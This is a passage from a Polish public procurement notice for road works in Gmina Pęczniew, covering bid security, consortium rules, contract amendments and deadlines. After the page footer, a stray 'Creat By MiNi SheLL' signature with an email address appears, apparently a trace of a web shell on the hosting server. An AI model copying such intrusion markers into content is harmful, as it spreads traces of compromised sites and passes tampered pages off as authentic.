poręczeniach udzielanych przez podmioty, o<br/>których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej<br/>Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).XVII.4. Wadium w formie<br/>pieniądza należy wnieść przelewem na konto w Banku Spółdzielczym w Poddębicach nr<br/>rachunku 45 9263 0000 4012 3060 2004 0003. z dopiskiem na przelewie: „Wadium w<br/>postępowaniu ZP271.2.2021”UWAGA: Za termin wniesienia wadium w formie pieniężnej<br/>zostanie przyjęty termin uznania rachunku Zamawiającego.XVII.5. Wadium wnoszone w formie<br/>poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci<br/>elektronicznej i spełniać co najmniej poniższe wymagania: A) musi obejmować odpowiedzialność<br/>za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie<br/>P.z.p.; B) z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej<br/>kwoty wadium; C) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze<br/>żądanie; termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin<br/>związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania<br/>ofert); D) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer<br/>przedmiotowego postępowania; E) Beneficjentem poręczenia lub gwarancji jest: Gmina<br/>Pęczniew, ul. Główna 10/12; 99-235 Pęczniew; F) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 P.z.p.), Zamawiający wymaga aby poręczenie<br/>lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji)<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści<br/>wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (konsorcjum).XVII.6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium<br/>w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania<br/>ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3<br/>P.z.p. zostanie odrzucona .XVII.7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa<br/>art. 98 P.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> /numeracja zgodnie z SWZ/XII. Informacja dla wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia (spółki cywilne/ konsorcja).XII.1 Wykonawcy mogą wspólnie ubiegać się<br/>o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie<br/>zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. XII.2. W przypadku<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których<br/>mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają<br/>brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu.XII.3. Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego<br/>wynika, które roboty budowlane wykonają poszczególni wykonawcy.XII.4. Oświadczenia i<br/>dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie.XII.5. Jeżeli oferta Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia publicznego zostanie wybrana, Zamawiający<br/>zażąda złożenia przed zawarciem umowy w sprawie zamówienia publicznego umowy<br/>regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowy zakres oraz warunki wprowadzenia zmian do umowy wskazane zostały w pkt XXII<br/>SWZ dostępnym na stronie postępowania http://e-peczniew.pl/ zamówienia powyżej 130 000<br/>zł. Ze względu na ograniczoną ilość znaków poniżej wskazano ogólne przesłanki<br/>zmiany: Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej<br/>umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w<br/>zakresie: A) zaistnienia omyłki pisarskiej lub rachunkowej; B) zmiany terminu wykonania<br/>zamówienia w następujących przypadkach: a) wystąpienie siły wyższej rozumianej jako<br/>wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i<br/>zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a<br/>które uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub części. b)<br/>wystąpienia nietypowych dla klimatu polskiego warunków atmosferycznych uniemożliwiających<br/>prowadzenie zamówień/robót budowlanych zgodnie z technologią ich wykonania. c) zaistnienia<br/>odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności<br/>napotkania innych niezinwentaryzowanych sieci, urządzeń podziemnych kolidujących z archeologicznych, niewybuchów, niewypałów. d) konieczność wykonania robót zamiennych o<br/>pracochłonności większej od robót pierwotnie przewidzianych do wykonania. Termin zostanie<br/>wydłużony o czas niezbędny na wykonanie tych robót. e) przedłużających się procedur<br/>administracyjnych, o czas odpowiadający przedłużeniu się procedury ponad termin wynikający z<br/>właściwych przepisów prawa, f) konieczności zmiany dokumentacji projektowej z przyczyn<br/>nieobciążających Wykonawcę, o czas, w którym dokumentacja ta była przygotowywana, nie<br/>dłużej niż o 30 dni. g) w przypadku niemożliwości dochowania terminu realizacji umowy, z<br/>przyczyn innych niż wymienione powyżej, a nie obciążających Wykonawcy (w szczególności<br/>niemożliwość terminowego kupna materiałów budowlanych lub ich transportu na miejsce<br/>realizacji zamówienia). h) konieczności poprawy jakości lub innych parametrów<br/>charakterystycznych dla danego elementu robot budowlanych lub zmiany technologii. C) zmiany<br/>podwykonawców na zasobach, których Wykonawca opierał się wykazując spełnianie warunków<br/>udziału w postępowaniu pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków<br/>w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne<br/>dotychczasowy podwykonawca, D) zmiany przepisów prawa istotnych dla postanowień zawartej<br/>umowy. E) zmiany stawki podatku VAT: a) w przypadku zwiększenia stawki podatku VAT - ceny<br/>jednostkowe netto nie mogą być wyższe niż zadeklarowane w kosztorysie ofertowym. Wartość<br/>wynagrodzenia brutto zostanie powiększona z odpowiednim zastosowaniem zmniejszonej<br/>stawki podatku VAT. b) w przypadku zmniejszenia stawki podatku VAT - ceny jednostkowe netto<br/>nie mogą być wyższe niż zadeklarowane w kosztorysie ofertowym. Wartość wynagrodzenia<br/>brutto zostanie pomniejszona z odpowiednim zastosowaniem zmniejszonej stawki podatku<br/>VAT.F) zmiany Kierownika Budowy Wykonawcy na skutek zdarzeń losowych, zmian kadrowopersonalnych, utraty wymaganych uprawnień, utraty stanowiska z zastrzeżeniem<br/>równoważności uprawnień oraz wykazanego w ofercie doświadczenia zawodowego. G) zmiany<br/>sposobu wykonania przedmiotu zawartej umowy w następujących okolicznościach:- w<br/>przypadku modyfikacji przedmiotu zamówienia w związku z wystąpieniem robót dodatkowych<br/>lub zamiennych, których nie można było przewidzieć przed zawarciem umowy, wprowadzonych<br/>na wniosek Zamawiającego,- w przypadku konieczności usunięcia błędów lub wprowadzenie<br/>zmian w dokumentacji projektowej lub specyfikacji wykonania i odbioru robót. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP (Elektronicznej Skrzynki Podawczej – nazwa – /byp620p7f6/skrytka) i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-21 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie stosunku pracy w okresie realizacji przedmiotu zamówienia osób wykonujących następujące czynności w trakcie realizacji zamówienia obejmujące:<br/>A)	roboty w zakresie przygotowania terenu,<br/>B)	roboty pielęgnacyjne – podkrzesanie krzewów,<br/>C)	roboty w zakresie prac ziemnych,<br/>D)	roboty w zakresie prac drogowych, <br/>E)	roboty w zakresie remontów przepustów drogowych,<br/>F)	roboty w zakresie oznakowania pionowego i poziomego.<br/>Szczegółowe informacje w powyższym zakresie zawarte zostały w pkt IV SWZ dostępnym na stronie postępowania http://e-peczniew.pl/ zamówienia powyżej 130 000 zł. Okres gwarancji i rękojmi za wady nie może być krótszy niż 60 miesięcy. Osobą uprawnioną przez Zamawiającego do porozumiewania się z Wykonawcami jest:- Marta Zasiadczyk – Kierownik referatu Infrastruktury, Gospodarki Przestrzennej, Gospodarki Nieruchomościami, Ochrony Środowiska, Rolnictwa i Inwestycji – tel.43 678 15 19 wew. 24.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-02 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com